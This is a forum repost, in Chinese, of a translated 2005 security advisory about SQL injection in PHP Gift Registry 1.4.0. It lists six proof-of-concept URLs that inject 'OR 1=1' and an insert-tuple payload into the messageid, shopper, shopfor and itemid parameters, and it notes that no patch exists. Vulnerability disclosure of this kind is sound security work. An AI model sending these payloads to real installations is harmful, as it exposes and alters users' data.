邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [翻译]PHP Gift Registry参数输入合法性漏洞导致SQL注入 [查看完整版本]

hak_ban[HSG] 2005-1-18 22:17

[翻译]PHP Gift Registry参数输入合法性漏洞导致SQL注入

翻译:Z.C.Y[B.C.T]
翻译网站:[url]http://www.bnso.net/[/url]
安全公告：1012910
资料来源：[url]http://securitytracker.com/id?1012910[/url]
CVE 参考：GENERIC-MAP-NOMATCH
发布日期：2005-1-16
发布作者：Madelman <[email]madelman@iname.com[/email]>
漏洞危害：泄露系统信息，泄露用户信息，修改用户信息
漏洞利用程序包含：是
影响版本：1.4.0
厂商地址：phpgiftreg.sourceforge.net
漏洞起因：输入合法性错误
影响系统：Linux (Any), UNIX (Any), Windows (Any)

漏洞描述：Madelman发现在PHP Gift Registry (phpGiftReq)中存在输入合法性漏洞，导致远程用户可以实行SQL注入。
这是脚本对用户的合法性输入过滤不严导致，远程用户可以精心构造一个URL执行SQL注入。

提供如下测试方法：
http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1

http://[target ]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1

http://[target]/phpgiftreg/i ndex.php?action=request&shopfor=3%2c0%29%2c%2899%2c100

http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1

http://[target]/phpgiftreg/item.php ?action=delete&itemid=3%20OR%201%3d1

其他的参数和函数可能也受到影响。

解决方法：目前厂商还没有提供补丁或者升级程序

查看完整版本: [翻译]PHP Gift Registry参数输入合法性漏洞导致SQL注入

© 1999-2008 EvilOctal Security Team